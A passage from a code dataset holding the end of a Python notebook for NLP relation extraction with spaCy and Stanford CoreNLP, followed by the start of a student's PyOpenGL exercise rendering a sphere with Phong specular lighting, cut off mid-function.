len(parsedDataFromSpacy)):\n parsedText = parsedDataFromSpacy[index]\n token = parsedText[0]\n dep = parsedText[1]\n head_text = parsedText[2]\n head_text_index = parsedText[3]\n head_pos = parsedText[4]\n childs = parsedText[5]\n \n if head_pos=='VERB':\n #if head_text != 'incorporates':\n # continue\n subject_ = getSubject(parsedDataFromSpacy, head_text_index)\n #print(subject_)\n object_ = getObject(parsedDataFromSpacy, head_text_index)\n subj_obj_rel.append((subject_, head_text, object_))\n #print((subject_, head_text, object_))\n return set(subj_obj_rel)\n\n#parsedText = getParseDataFromTextDict('Apple is looking at buying U.K. 
startup for $1 billion')\n#print(parsedText)\n#parsedText = getParseDataFromTextDict('Dr Costanza Russo has developed a partnership with the Seven Pillars Institute for Global Finance and Ethics based in Kansas, and is working on a research project with Justice Blair and others on how to create an ethical culture in the banking sector.')\n#parsedText = getParseDataFromTextDict('Mortgages can either be funded through the banking sector (that is, through short-term deposits) or through the capital markets through a process called \"securitization\", which converts pools of mortgages into fungible bonds that can be sold to investors in small denominations.')\n#getAllSubjectObjectRelation(parsedText)\n#getAllSubjectObjectRelation(getParseDataFromTextDict(text))\n\n\n# In[16]:\n\n\n# content = open('C:\\\\Saheb\\\\Projects\\\\Ontology creation\\\\Content downloaded from Internet\\\\Financial Law_html_0_cleaned.txt', encoding='utf8').read()\n\n# for contentSplit in content.split('\\n'):\n# for sentence in nltk.sent_tokenize(contentSplit):\n# print(sentence)\n# parsedText = getParseDataFromText(sentence)\n# #print(parsedText)\n# print(getAllSubjectObjectRelation(parsedText))\n# print('\\n')\n\n\n# In[17]:\n\n\n# from subject_object_extraction import findSVOs\n\n# # can still work even without punctuation\n# for contentSplit in content.split('\\n'):\n# for sentence in nltk.sent_tokenize(contentSplit):\n# print(sentence)\n# parse = nlp(sentence)\n# print(findSVOs(parse))\n# print()\n\n\n# ### Using spacy vector similarity function\n\n# In[18]:\n\n\ndef getSimilarity(word1, word2):\n tokens = nlp(word1+\" \"+word2)\n return tokens[0].similarity(tokens[1])\n\n\n# ## Stanford CoreNLP\n\n# In[1]:\n\n\nfrom pycorenlp import StanfordCoreNLP\nstanford_nlp = StanfordCoreNLP('http://localhost:9001')\n\n\n# ### Pos tagging\n\n# In[2]:\n\n\ndef getPOSTaggedDataFromTextUsingStanford(text):\n posSentences = []\n output = stanford_nlp.annotate(text, properties={'annotators': 'tokenize,ssplit,pos','outputFormat': 'json'})\n for s in output['sentences']:\n posSentences.append(\" \".join([t[\"word\"]+\"/\"+t[\"pos\"] for t in s[\"tokens\"]]))\n return posSentences\n\n\n# ### Named entity tagging\n\n# In[4]:\n\n\ndef getNERDataFromText(text):\n nerSentences = []\n output = stanford_nlp.annotate(text, properties={'annotators': 'tokenize, ssplit, pos, lemma,ner','outputFormat': 'json'})\n for s in output['sentences']:\n #print (\"NER:\\t\", \" \".join([t[\"word\"]+\"/\"+t[\"ner\"]+\"/\"+t[\"pos\"] for t in s[\"tokens\"]]))\n nerSentences.append(\" \".join([t[\"word\"]+\"/\"+t[\"ner\"]+\"/\"+t[\"pos\"] for t in s[\"tokens\"]]))\n return nerSentences\n#getNERDataFromText('Allegra Knopf Esq, Florida BarNo. 307660')\n\n\n# ### Corenlp Coreference resolution\n\n# In[21]:\n\n\n#inputText= 'Messi was the first to win Euro cup. 
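# The Stanford helpers above emit flat strings like 'word/NER/POS'. A tiny
# self-contained parser for that format; the sample string is made up.
def parse_tagged(tagged_sentence):
    # rsplit from the right so tokens containing '/' keep their text intact
    return [tuple(chunk.rsplit("/", 2)) for chunk in tagged_sentence.split()]

print(parse_tagged("Allegra/PERSON/NNP Knopf/PERSON/NNP Esq/O/NNP"))
# [('Allegra', 'PERSON', 'NNP'), ('Knopf', 'PERSON', 'NNP'), ('Esq', 'O', 'NNP')]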
He is also the highest score of all time.'\ndef getCoreference(text):\n output = stanford_nlp.annotate(text, properties={'annotators': 'tokenize, ssplit, pos, lemma, ner, parse, dcoref','outputFormat': 'json'})\n #print(output['corefs'])\n sentList = []\n for sentenceJSONStr in output['sentences']:\n sentList.append(\" \".join([t[\"word\"] for t in sentenceJSONStr[\"tokens\"]]))\n \n # Format will be sent Num/reference : sentNum/referenceTo\n reference_dict = {}\n for keyIterate in output['corefs'].keys():\n reference = ''\n referenceTo = ''\n if len(output['corefs'][keyIterate])>1:\n for jsonStr in output['corefs'][keyIterate]:\n if jsonStr['isRepresentativeMention'] == True:\n reference = str(jsonStr['sentNum']) + \"/\" + jsonStr['text']\n elif jsonStr['isRepresentativeMention'] == False:\n referenceTo = str(jsonStr['sentNum']) + \"/\" + jsonStr['text']\n reference_dict[reference] = referenceTo\n print(reference_dict)\n for reference in reference_dict.keys():\n referenceTo = reference_dict[reference].split(\"/\")\n # -1 for sentence index\n sentList[int(referenceTo[0])-1] = sentList[int(referenceTo[0]) - 1].replace(referenceTo[1], reference.split(\"/\")[1]) \n return sentList\n\n#getCoreference('MB Financial in Chicago is shutting down its national mortgage business.The $20 billion-asset company that the decision was based on recent economic changes, heavy competition, “very low” margins and input from shareholders')\n\n\n# In[22]:\n\n\n#getSimilarity('mortgage_loan', 'home_loan')\n\n\n# In[23]:\n\n\n#getPOSTaggedDataFromTextUsingStanford('he difference between a mortgage banker and a mortgage broker is that the mortgage banker funds loans with its own capital.')\n\n\n# In[24]:\n\n\n# text = 'Mortgage bank is a bank that specializes in originating and/or servicing mortgage loans.'\n# output = stanford_nlp.annotate(text, properties={'annotators': 'tokenize, ssplit, pos, lemma, ner, parse, dcoref','outputFormat': 'json'})\n# print(output['corefs'])\n# sentList = []\n# for sentenceJSONStr in output['sentences']:\n# sentList.append(\" \".join([t[\"word\"] for t in sentenceJSONStr[\"tokens\"]]))\n\n# # Format will be sent Num/reference : sentNum/referenceTo\n# reference_dict = {}\n# for keyIterate in output['corefs'].keys():\n# reference = ''\n# referenceTo = ''\n# if len(output['corefs'][keyIterate])>1:\n# for jsonStr in output['corefs'][keyIterate]:\n# if jsonStr['isRepresentativeMention'] == True:\n# reference = str(jsonStr['sentNum']) + \"/\" + jsonStr['text']\n# elif jsonStr['isRepresentativeMention'] == False:\n# referenceTo = str(jsonStr['sentNum']) + \"/\" + jsonStr['text']\n# reference_dict[reference] = referenceTo\n# print(reference_dict)\n# for reference in reference_dict.keys():\n# referenceTo = reference_dict[reference].split(\"/\")\n# # -1 for sentence index\n# sentList[int(referenceTo[0])-1] = sentList[int(referenceTo[0]) - 1].replace(referenceTo[1], reference.split(\"/\")[1]) \n# sentList\n\n\n# ### Finding entity relations\n# \n# #### Format for the returned object\n# * (Index, Token, POS, Relation (if any))\n# * Relation can be S -> subject, R -> Relation, O -> Object\n\n# In[32]:\n\n\ndef getRelationBetweenEntitiesUsingStanford(sentence):\n sentenceRelation = []\n output = stanford_nlp.annotate(sentence, properties={\"annotators\":\"tokenize,ssplit,pos,depparse,natlog,openie\",\n \"outputFormat\": \"json\",\n \"openie.triple.strict\":\"true\",\n \"openie.max_entailments_per_clause\":\"1\"})\n for sentence in output['sentences']:\n print(sentence['openie'])\n for word in 
output['sentences'][0]['tokens']:\n isFound = False\n num=0\n for temp in sentence['openie']:\n num+=1\n if word['index'] > temp['subjectSpan'][0] and word['index'] <= temp['subjectSpan'][1]:\n sentenceRelation.append((word['index'], word['originalText'], word['pos'], 'S' + str(num), ''))\n isFound = True\n break\n if word['index'] > temp['relationSpan'][0] and word['index'] <= temp['relationSpan'][1]:\n sentenceRelation.append((word['index'], word['originalText'], word['pos'], 'R' + str(num), temp['relation']))\n isFound = True\n break\n if word['index'] > temp['objectSpan'][0] and word['index'] <= temp['objectSpan'][1]:\n sentenceRelation.append((word['index'], word['originalText'], word['pos'], 'O' + str(num), ''))\n isFound = True\n break\n if not isFound:\n sentenceRelation.append((word['index'], word['originalText'], word['pos'], '', ''))\n return sentenceRelation\n\n\n# In[33]:\n\n\ndef updateTuple(relationsTemp, tuple_to_update):\n relationsTempNew = []\n for index in range(0, len(relationsTemp)):\n relation = relationsTemp[index]\n if index in tuple_to_update.keys():\n relationsTempNew.append((relation[0], relation[1], relation[2], tuple_to_update[index], relation[4]))\n else:\n relationsTempNew.append(relation)\n return relationsTempNew\n\n\n# In[34]:\n\n\ndef reviseSubjectObject(relations):\n tuple_to_update = {}\n for index in range(0, len(relations)):\n relation = relations[index]\n ## Checking Subject\n if relation[3] !='' and relation[3].startswith('S'):\n for index1 in reversed(range(0, index)):\n if relations[index1][2] in ['NN', 'NNS', 'NNP', 'JJ'] and relations[index1][3] != relation[3]:\n tuple_to_update[index1] = relation[3]\n else:\n break\n \n for index1 in range(index+1, len(relations)):\n if relations[index1][2] in ['NN', 'NNS', 'NNP', 'JJ'] and relations[index1][3] != relation[3]:\n tuple_to_update[index1] = relation[3]\n else:\n break\n ## Checking Object\n elif relation[3] !='' and relation[3].startswith('O'):\n for index1 in reversed(range(0, index)):\n if relations[index1][2] in ['NN', 'NNS', 'NNP', 'JJ'] and relations[index1][3] != relation[3]:\n tuple_to_update[index1] = relation[3]\n else:\n break\n \n for index1 in range(index+1, len(relations)):\n if relations[index1][2] in ['NN', 'NNS', 'NNP', 'JJ'] and relations[index1][3] != relation[3]:\n tuple_to_update[index1] = relation[3]\n else:\n break \n relations_new = updateTuple(relations, tuple_to_update)\n return relations_new\n\n\n# In[36]:\n\n\n## testing relation finding\n#sent = 'To prevent discrimination in the credit-granting process, the regulation imposes a delicate balance between the creditor’s need to know as much as possible about a prospective borrower with the borrower’s right not to disclose information irrelevant to the credit transaction as well as relevant information that is likely to be used in connection with discrimination on a prohibited basis. 
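# A tiny usage sketch for the span-growing pass above (it requires
# reviseSubjectObject/updateTuple to be defined, i.e. run it below them).
# Tuples follow the (index, token, POS, role, relation) layout returned by
# getRelationBetweenEntitiesUsingStanford; the sentence is made up.
toy = [
    (1, "private", "JJ", "", ""),
    (2, "equity", "NN", "S1", ""),
    (3, "fund", "NN", "", ""),
    (4, "is", "VBZ", "R1", "is"),
    (5, "scheme", "NN", "O1", ""),
]
# 'private' and 'fund' sit next to the subject token with JJ/NN tags, so
# the revision should absorb both into S1 while leaving R1/O1 untouched.
print(reviseSubjectObject(toy))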
To this end, the regulation addresses taking, evaluating, and acting on applications as well as furnishing and maintaining credit information.'\n#relations = getRelationBetweenEntitiesUsingStanford(sent)\n#print(relations)\n#reviseSubjectObject(relations)\n\n\n# In[37]:\n\n\n# subj_rel_obj_dict = {}\n\n# for line in open('C:\\Saheb\\Projects\\Ontology creation\\Wikipedia documents\\HTML_And_Cleaned_Text\\\\equity funds_cleaned.txt').read().split('\\n'):\n# for sent in nltk.sent_tokenize(line):\n# rel_map = {}\n# relations = getRelationBetweenEntitiesUsingStanford(sent)\n# for relation in reviseSubjectObject(relations):\n# if relation[3]!='': \n# if relation[3] in rel_map:\n# rel_map[relation[3]] = rel_map[relation[3]] + ' ' + relation[1]\n# else:\n# rel_map[relation[3]] = relation[1]\n \n# for index in range(1, len(rel_map)):\n# S_index = 'S'+str(index)\n# O_index = 'O'+str(index)\n# R_index = 'R'+str(index)\n# if S_index in rel_map or O_index in rel_map or R_index in rel_map:\n# S = ''\n# R = ''\n# O = ''\n# if S_index in rel_map:\n# S =rel_map[S_index]\n# if R_index in rel_map:\n# R =rel_map[R_index]\n# if O_index in rel_map:\n# O =rel_map[O_index]\n \n# print((S, R, O))\n# else:\n# break\n \n# print()\n\n\n# #### End of enitty relation extraction \n","sub_path":"Spacy_Tagging.py","file_name":"Spacy_Tagging.py","file_ext":"py","file_size_in_byte":21001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"570899912","text":"\"\"\" AULA 12 - Parte 2\nAluno: Richard Calderan\nUSP: 3672382\nExercício\nAplique o modelo de iluminação especular em uma esfera.\n\nFaça com que o parâmetro expoente de reflexão especular seja incrementado/decrementado por alguma tecla. OBS: faça incremento na potência de dois.\nbotões R, F, T, G\n\"\"\"\n\nimport glfw\nfrom OpenGL.GL import *\nimport OpenGL.GL.shaders\nimport numpy as np\nimport glm\nimport math\nfrom PIL import Image\n\nglfw.init()\nglfw.window_hint(glfw.VISIBLE, glfw.FALSE);\naltura = 900\nlargura = 900\nwindow = glfw.create_window(largura, altura, \"Iluminação especular (phong)\", None, None)\nglfw.make_context_current(window)\n\nvertex_code = \"\"\"\n attribute vec3 position;\n attribute vec2 texture_coord;\n attribute vec3 normals;\n \n \n varying vec2 out_texture;\n varying vec3 out_fragPos;\n varying vec3 out_normal;\n \n uniform mat4 model;\n uniform mat4 view;\n uniform mat4 projection; \n \n void main(){\n gl_Position = projection * view * model * vec4(position,1.0);\n out_texture = vec2(texture_coord);\n out_fragPos = vec3(model * vec4(position, 1.0));\n out_normal = normals; \n }\n \"\"\"\nfragment_code = \"\"\"\n\n // parametros da iluminacao ambiente e difusa\n uniform vec3 lightPos; // define coordenadas de posicao da luz\n uniform float ka; // coeficiente de reflexao ambiente\n uniform float kd; // coeficiente de reflexao difusa\n \n // parametros da iluminacao especular\n uniform vec3 viewPos; // define coordenadas com a posicao da camera/observador\n uniform float ks; // coeficiente de reflexao especular\n uniform float ns; // expoente de reflexao especular\n \n // parametro com a cor da(s) fonte(s) de iluminacao\n vec3 lightColor = vec3(1.0, 1.0, 1.0);\n\n // parametros recebidos do vertex shader\n varying vec2 out_texture; // recebido do vertex shader\n varying vec3 out_normal; // recebido do vertex shader\n varying vec3 out_fragPos; // recebido do vertex shader\n uniform sampler2D samplerTexture;\n \n \n \n void main(){\n \n // calculando reflexao ambiente\n vec3 ambient = ka 
* lightColor; \n \n // calculando reflexao difusa\n vec3 norm = normalize(out_normal); // normaliza vetores perpendiculares\n vec3 lightDir = normalize(lightPos - out_fragPos); // direcao da luz\n float diff = max(dot(norm, lightDir), 0.0); // verifica limite angular (entre 0 e 90)\n vec3 diffuse = kd * diff * lightColor; // iluminacao difusa\n \n // calculando reflexao especular\n vec3 viewDir = normalize(viewPos - out_fragPos); // direcao do observador/camera\n vec3 reflectDir = reflect(-lightDir, norm); // direcao da reflexao\n float spec = pow(max(dot(viewDir, reflectDir), 0.0), ns);\n vec3 specular = ks * spec * lightColor; \n \n // aplicando o modelo de iluminacao\n vec4 texture = texture2D(samplerTexture, out_texture);\n vec4 result = vec4((ambient + diffuse + specular),1.0) * texture; // aplica iluminacao\n gl_FragColor = result;\n\n }\n \"\"\"\n# Request a program and shader slots from GPU\nprogram = glCreateProgram()\nvertex = glCreateShader(GL_VERTEX_SHADER)\nfragment = glCreateShader(GL_FRAGMENT_SHADER)\n\n# Set shaders source\nglShaderSource(vertex, vertex_code)\nglShaderSource(fragment, fragment_code)\n\n\n# Compile shaders\nglCompileShader(vertex)\nif not glGetShaderiv(vertex, GL_COMPILE_STATUS):\n error = glGetShaderInfoLog(vertex).decode()\n print(error)\n raise RuntimeError(\"Erro de compilacao do Vertex Shader\")\n\nglCompileShader(fragment)\nif not glGetShaderiv(fragment, GL_COMPILE_STATUS):\n error = glGetShaderInfoLog(fragment).decode()\n print(error)\n raise RuntimeError(\"Erro de compilacao do Fragment Shader\")\n\n# Attach shader objects to the program\nglAttachShader(program, vertex)\nglAttachShader(program, fragment)\n\n# Build program\nglLinkProgram(program)\nif not glGetProgramiv(program, GL_LINK_STATUS):\n print(glGetProgramInfoLog(program))\n raise RuntimeError('Linking error')\n \n# Make program the default program\nglUseProgram(program)\n\ndef load_model_from_file(filename):\n \"\"\"Loads a Wavefront OBJ file. 
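# CPU-side sketch of the illumination model the fragment shader above
# evaluates: ambient + Lambert diffuse + Phong specular for a white light.
# The vectors and coefficients below are illustrative values only.
import numpy as np

def phong(normal, light_dir, view_dir, ka, kd, ks, ns):
    n = normal / np.linalg.norm(normal)
    l = light_dir / np.linalg.norm(light_dir)
    v = view_dir / np.linalg.norm(view_dir)
    diff = max(np.dot(n, l), 0.0)                 # Lambert term
    r = 2.0 * np.dot(n, l) * n - l                # reflect l about n
    spec = max(np.dot(v, r), 0.0) ** ns           # highlight, sharpened by ns
    return ka + kd * diff + ks * spec

# Doubling ns narrows the highlight, which is why the key handler below
# steps the exponent in powers of two.
print(phong(np.array([0.0, 0.0, 1.0]), np.array([0.0, 1.0, 1.0]),
            np.array([0.0, 0.0, 1.0]), 0.3, 0.3, 0.9, 32.0))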
\"\"\"\n objects = {}\n vertices = []\n normals = []\n texture_coords = []\n faces = []\n\n material = None\n\n # abre o arquivo obj para leitura\n for line in open(filename, \"r\"): ## para cada linha do arquivo .obj\n if line.startswith('#'): continue ## ignora comentarios\n values = line.split() # quebra a linha por espaço\n if not values: continue\n\n\n ### recuperando vertices\n if values[0] == 'v':\n vertices.append(values[1:4])\n\n ### recuperando vertices\n if values[0] == 'vn':\n normals.append(values[1:4])\n\n ### recuperando coordenadas de textura\n elif values[0] == 'vt':\n texture_coords.append(values[1:3])\n\n ### recuperando faces \n elif values[0] in ('usemtl', 'usemat'):\n material = values[1]\n elif values[0] == 'f':\n face = []\n face_texture = []\n face_normals = []\n for v in values[1:]:\n w = v.split('/')\n face.append(int(w[0]))\n face_normals.append(int(w[2]))\n if len(w) >= 2 and len(w[1]) > 0:\n face_texture.append(int(w[1]))\n else:\n face_texture.append(0)\n\n faces.append((face, face_texture, face_normals, material))\n\n model = {}\n model['vertices'] = vertices\n model['texture'] = texture_coords\n model['faces'] = faces\n model['normals'] = normals\n\n return model\n \nglEnable(GL_TEXTURE_2D)\nqtd_texturas = 10\ntextures = glGenTextures(qtd_texturas)\n\ndef load_texture_from_file(texture_id, img_textura):\n glBindTexture(GL_TEXTURE_2D, texture_id)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n img = Image.open(img_textura)\n img_width = img.size[0]\n img_height = img.size[1]\n image_data = img.tobytes(\"raw\", \"RGB\", 0, -1)\n #image_data = np.array(list(img.getdata()), np.uint8)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, img_width, img_height, 0, GL_RGB, GL_UNSIGNED_BYTE, image_data)\n \nvertices_list = [] \nnormals_list = [] \ntextures_coord_list = []\n\n\nmodelo = load_model_from_file('caixa1.obj')\n### inserindo vertices do modelo no vetor de vertices\nprint('Processando modelo caixa1.obj. Vertice inicial:',len(vertices_list))\nfor face in modelo['faces']:\n for vertice_id in face[0]:\n vertices_list.append( modelo['vertices'][vertice_id-1] )\n for texture_id in face[1]:\n textures_coord_list.append( modelo['texture'][texture_id-1] )\n for normal_id in face[2]:\n normals_list.append( modelo['normals'][normal_id-1] )\nprint('Processando modelo caixa1.obj. Vertice final:',len(vertices_list))\n\n### inserindo coordenadas de textura do modelo no vetor de texturas\n\n\n### carregando textura equivalente e definindo um id (buffer): use um id por textura!\nload_texture_from_file(0,'caixa_azul.jpg')\n\n\nmodelo = load_model_from_file('luz.obj')\n### inserindo vertices do modelo no vetor de vertices\nprint('Processando modelo luz.obj. Vertice inicial:',len(vertices_list))\nfor face in modelo['faces']:\n for vertice_id in face[0]:\n vertices_list.append( modelo['vertices'][vertice_id-1] )\n for texture_id in face[1]:\n textures_coord_list.append( modelo['texture'][texture_id-1] )\n for normal_id in face[2]:\n normals_list.append( modelo['normals'][normal_id-1] )\nprint('Processando modelo luz.obj.obj. Vertice final:',len(vertices_list))\nload_texture_from_file(1,'luz.png')\n\n\nmodelo = load_model_from_file('esfera.obj')\n### inserindo vertices do modelo no vetor de vertices\nprint('Processando modelo esfera.obj. 
Vertice inicial:',len(vertices_list))\nfor face in modelo['faces']:\n for vertice_id in face[0]:\n vertices_list.append( modelo['vertices'][vertice_id-1] )\n for texture_id in face[1]:\n textures_coord_list.append( modelo['texture'][texture_id-1] )\n for normal_id in face[2]:\n normals_list.append( modelo['normals'][normal_id-1] )\nprint('Processando modelo esfera.obj. Vertice final:',len(vertices_list))\n\n# Request a buffer slot from GPU\nbuffer = glGenBuffers(3)\n\nvertices = np.zeros(len(vertices_list), [(\"position\", np.float32, 3)])\nvertices['position'] = vertices_list\n\n\n# Upload data\nglBindBuffer(GL_ARRAY_BUFFER, buffer[0])\nglBufferData(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_STATIC_DRAW)\nstride = vertices.strides[0]\noffset = ctypes.c_void_p(0)\nloc_vertices = glGetAttribLocation(program, \"position\")\nglEnableVertexAttribArray(loc_vertices)\nglVertexAttribPointer(loc_vertices, 3, GL_FLOAT, False, stride, offset)\n\ntextures = np.zeros(len(textures_coord_list), [(\"position\", np.float32, 2)]) # duas coordenadas\ntextures['position'] = textures_coord_list\n\n\n# Upload data\nglBindBuffer(GL_ARRAY_BUFFER, buffer[1])\nglBufferData(GL_ARRAY_BUFFER, textures.nbytes, textures, GL_STATIC_DRAW)\nstride = textures.strides[0]\noffset = ctypes.c_void_p(0)\nloc_texture_coord = glGetAttribLocation(program, \"texture_coord\")\nglEnableVertexAttribArray(loc_texture_coord)\nglVertexAttribPointer(loc_texture_coord, 2, GL_FLOAT, False, stride, offset)\n\nnormals = np.zeros(len(normals_list), [(\"position\", np.float32, 3)]) # três coordenadas\nnormals['position'] = normals_list\n\n\n# Upload coordenadas normals de cada vertice\nglBindBuffer(GL_ARRAY_BUFFER, buffer[2])\nglBufferData(GL_ARRAY_BUFFER, normals.nbytes, normals, GL_STATIC_DRAW)\nstride = normals.strides[0]\noffset = ctypes.c_void_p(0)\nloc_normals_coord = glGetAttribLocation(program, \"normals\")\nglEnableVertexAttribArray(loc_normals_coord)\nglVertexAttribPointer(loc_normals_coord, 3, GL_FLOAT, False, stride, offset)\n\nloc_light_pos = glGetUniformLocation(program, \"lightPos\") # recuperando localizacao da variavel lightPos na GPU\n\n\ndef desenha_caixa(): \n\n # aplica a matriz model\n angle = 0.0\n \n r_x = 0.0; r_y = 1.0; r_z = 0.0;\n \n # translacao\n t_x = 0.0; t_y = 0.0; t_z = 0.0;\n \n # escala\n s_x = 1.0; s_y = 1.0; s_z = 1.0;\n \n mat_model = model(angle, r_x, r_y, r_z, t_x, t_y, t_z, s_x, s_y, s_z)\n loc_model = glGetUniformLocation(program, \"model\")\n glUniformMatrix4fv(loc_model, 1, GL_TRUE, mat_model)\n \n \n #### define parametros de ilumincao do modelo\n ka = 0.3 # coeficiente de reflexao ambiente do modelo\n kd = 0.3 # coeficiente de reflexao difusa do modelo\n ks = 0.9 # coeficiente de reflexao especular do modelo\n ns = 64.0 # expoente de reflexao especular\n \n loc_ka = glGetUniformLocation(program, \"ka\") # recuperando localizacao da variavel ka na GPU\n glUniform1f(loc_ka, ka) ### envia ka pra gpu\n \n loc_kd = glGetUniformLocation(program, \"kd\") # recuperando localizacao da variavel kd na GPU\n glUniform1f(loc_kd, kd) ### envia kd pra gpu \n \n loc_ks = glGetUniformLocation(program, \"ks\") # recuperando localizacao da variavel ks na GPU\n glUniform1f(loc_ks, ks) ### envia ks pra gpu \n \n loc_ns = glGetUniformLocation(program, \"ns\") # recuperando localizacao da variavel ns na GPU\n glUniform1f(loc_ns, ns) ### envia ns pra gpu \n\n \n #define id da textura do modelo\n glBindTexture(GL_TEXTURE_2D, 0)\n \n \n # desenha o modelo\n glDrawArrays(GL_TRIANGLES, 0, 36) ## renderizando\n\ndef 
desenha_luz(t_x, t_y, t_z):\n \n\n # aplica a matriz model\n angle = 0.0\n \n r_x = 0.0; r_y = 0.0; r_z = 1.0;\n \n # translacao\n #t_x = 0.0; t_y = 0.0; t_z = 0.0;\n \n # escala\n s_x = 0.1; s_y = 0.1; s_z = 0.1;\n \n mat_model = model(angle, r_x, r_y, r_z, t_x, t_y, t_z, s_x, s_y, s_z)\n loc_model = glGetUniformLocation(program, \"model\")\n glUniformMatrix4fv(loc_model, 1, GL_TRUE, mat_model)\n \n \n #### define parametros de ilumincao do modelo\n ka = 1 # coeficiente de reflexao ambiente do modelo\n kd = 1 # coeficiente de reflexao difusa do modelo\n ks = 1 # coeficiente de reflexao especular do modelo\n ns = 1000.0 # expoente de reflexao especular\n \n loc_ka = glGetUniformLocation(program, \"ka\") # recuperando localizacao da variavel ka na GPU\n glUniform1f(loc_ka, ka) ### envia ka pra gpu\n \n loc_kd = glGetUniformLocation(program, \"kd\") # recuperando localizacao da variavel kd na GPU\n glUniform1f(loc_kd, kd) ### envia kd pra gpu \n \n loc_ks = glGetUniformLocation(program, \"ks\") # recuperando localizacao da variavel ks na GPU\n glUniform1f(loc_ks, ks) ### envia ns pra gpu \n \n loc_ns = glGetUniformLocation(program, \"ns\") # recuperando localizacao da variavel ns na GPU\n glUniform1f(loc_ns, ns) ### envia ns pra gpu \n \n loc_light_pos = glGetUniformLocation(program, \"lightPos\") # recuperando localizacao da variavel lightPos na GPU\n glUniform3f(loc_light_pos, t_x, t_y, t_z) ### posicao da fonte de luz\n \n \n #define id da textura do modelo\n glBindTexture(GL_TEXTURE_2D, 1)\n \n \n # desenha o modelo\n glDrawArrays(GL_TRIANGLES, 36, 72-36) ## renderizando\n\n\n\nks = 0.9 # coeficiente de reflexao especular do modelo\nns = 32.0 # expoente de reflexao especular\n\ndef desenha_esfera(): \n global ks,ns\n # aplica a matriz model\n angle = 0.0\n \n r_x = 0.0; r_y = 1.0; r_z = 0.0;\n \n # translacao\n t_x = 0.0; t_y = 0.0; t_z = 0.0;\n \n # escala\n s_x = 1.0; s_y = 1.0; s_z = 1.0;\n \n mat_model = model(angle, r_x, r_y, r_z, t_x, t_y, t_z, s_x, s_y, s_z)\n loc_model = glGetUniformLocation(program, \"model\")\n glUniformMatrix4fv(loc_model, 1, GL_TRUE, mat_model)\n \n \n #### define parametros de ilumincao do modelo\n ka = 0.3 # coeficiente de reflexao ambiente do modelo\n kd = 0.3 # coeficiente de reflexao difusa do modelo\n \n loc_ka = glGetUniformLocation(program, \"ka\") # recuperando localizacao da variavel ka na GPU\n glUniform1f(loc_ka, ka) ### envia ka pra gpu\n \n loc_kd = glGetUniformLocation(program, \"kd\") # recuperando localizacao da variavel kd na GPU\n glUniform1f(loc_kd, kd) ### envia kd pra gpu \n \n loc_ks = glGetUniformLocation(program, \"ks\") # recuperando localizacao da variavel ks na GPU\n glUniform1f(loc_ks, ks) ### envia ks pra gpu \n \n loc_ns = glGetUniformLocation(program, \"ns\") # recuperando localizacao da variavel ns na GPU\n glUniform1f(loc_ns, ns) ### envia ns pra gpu \n\n \n #define id da textura do modelo\n glBindTexture(GL_TEXTURE_2D, 0)\n \n \n # desenha o modelo\n glDrawArrays(GL_TRIANGLES, 72, 46152-72) ## renderizando\n\n\ncameraPos = glm.vec3(0.0, 0.0, 1.0);\ncameraFront = glm.vec3(0.0, 0.0, -1.0);\ncameraUp = glm.vec3(0.0, 1.0, 0.0);\n\n\npolygonal_mode = False\n\n\nn=2 #expoente\ndef key_event(window,key,scancode,action,mods):\n global cameraPos, cameraFront, cameraUp, polygonal_mode, ks,ns,n\n \n cameraSpeed = 0.05\n if key == 87 and (action==1 or action==2): # tecla W\n cameraPos += cameraSpeed * cameraFront\n \n if key == 83 and (action==1 or action==2): # tecla S\n cameraPos -= cameraSpeed * cameraFront\n \n if key == 65 and 
(action==1 or action==2): # tecla A\n cameraPos -= glm.normalize(glm.cross(cameraFront, cameraUp)) * cameraSpeed\n \n if key == 68 and (action==1 or action==2): # tecla D\n cameraPos += glm.normalize(glm.cross(cameraFront, cameraUp)) * cameraSpeed\n \n if key == 80 and action==1 and polygonal_mode==True:\n polygonal_mode=False\n else:\n if key == 80 and action==1 and polygonal_mode==False:\n polygonal_mode=True\n \n if key == 82 and (action==1 or action==2): # tecla T\n ks+=0.1\n print(\"ks \",ks)\n if key == 70 and (action==1 or action==2): # tecla G\n ks-=0.1\n print(\"ks \",ks)\n \n if key == 84 and (action==1 or action==2): # tecla R\n n+=.5\n ns=2**n\n print(\"ns \",ns)\n \n if key == 71 and (action==1 or action==2): # tecla F\n n-=.5\n ns=2**n\n print(\"ns \",ns)\n\n \nfirstMouse = True\nyaw = -90.0 \npitch = 0.0\nlastX = largura/2\nlastY = altura/2\n\ndef mouse_event(window, xpos, ypos):\n global firstMouse, cameraFront, yaw, pitch, lastX, lastY\n if firstMouse:\n lastX = xpos\n lastY = ypos\n firstMouse = False\n\n xoffset = xpos - lastX\n yoffset = lastY - ypos\n lastX = xpos\n lastY = ypos\n\n sensitivity = 0.3 \n xoffset *= sensitivity\n yoffset *= sensitivity\n\n yaw += xoffset;\n pitch += yoffset;\n\n \n if pitch >= 90.0: pitch = 90.0\n if pitch <= -90.0: pitch = -90.0\n\n front = glm.vec3()\n front.x = math.cos(glm.radians(yaw)) * math.cos(glm.radians(pitch))\n front.y = math.sin(glm.radians(pitch))\n front.z = math.sin(glm.radians(yaw)) * math.cos(glm.radians(pitch))\n cameraFront = glm.normalize(front)\n\n\n \nglfw.set_key_callback(window,key_event)\nglfw.set_cursor_pos_callback(window, mouse_event)\n\ndef model(angle, r_x, r_y, r_z, t_x, t_y, t_z, s_x, s_y, s_z):\n \n angle = math.radians(angle)\n \n matrix_transform = glm.mat4(1.0) # instanciando uma matriz identidade\n \n # aplicando rotacao\n matrix_transform = glm.rotate(matrix_transform, angle, glm.vec3(r_x, r_y, r_z))\n \n \n # aplicando translacao\n matrix_transform = glm.translate(matrix_transform, glm.vec3(t_x, t_y, t_z)) \n \n # aplicando escala\n matrix_transform = glm.scale(matrix_transform, glm.vec3(s_x, s_y, s_z))\n \n matrix_transform = np.array(matrix_transform).T # pegando a transposta da matriz (glm trabalha com ela invertida)\n \n return matrix_transform\n\ndef view():\n global cameraPos, cameraFront, 